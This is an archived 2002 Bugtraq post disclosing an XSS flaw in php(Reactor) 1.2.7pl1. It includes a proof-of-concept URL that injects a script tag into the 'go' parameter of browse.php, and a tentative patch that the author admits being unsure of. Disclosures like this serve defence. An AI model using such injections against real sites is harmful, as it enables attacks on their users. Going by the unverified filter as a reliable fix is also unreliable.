Bugtraq mailing list archives
XSS bug in php(Reactor)
From: Arab VieruZ <arabviersus () hotmail com>
Date: 10 Oct 2002 12:43:11 -0000
Vulnerable systems: 1.2.7pl1 Exploit: forums/browse.php?fid=3&tid=46&go=<scri*pt>JavaScript:alert ('Hi');</scri*pt> (with out "*") Solution: i thought this but i am not sure open browse.php and add this code in line 52: $go = HTMLSpecialChars($go); $go = PREG_Replace("/[A-Z&.;:()~!@#$%^''*\{\}\/]/i", "", $go); ---------------------------------- Arab Vieruz thanx
Current thread:
- XSS bug in php(Reactor) Arab VieruZ (Oct 10)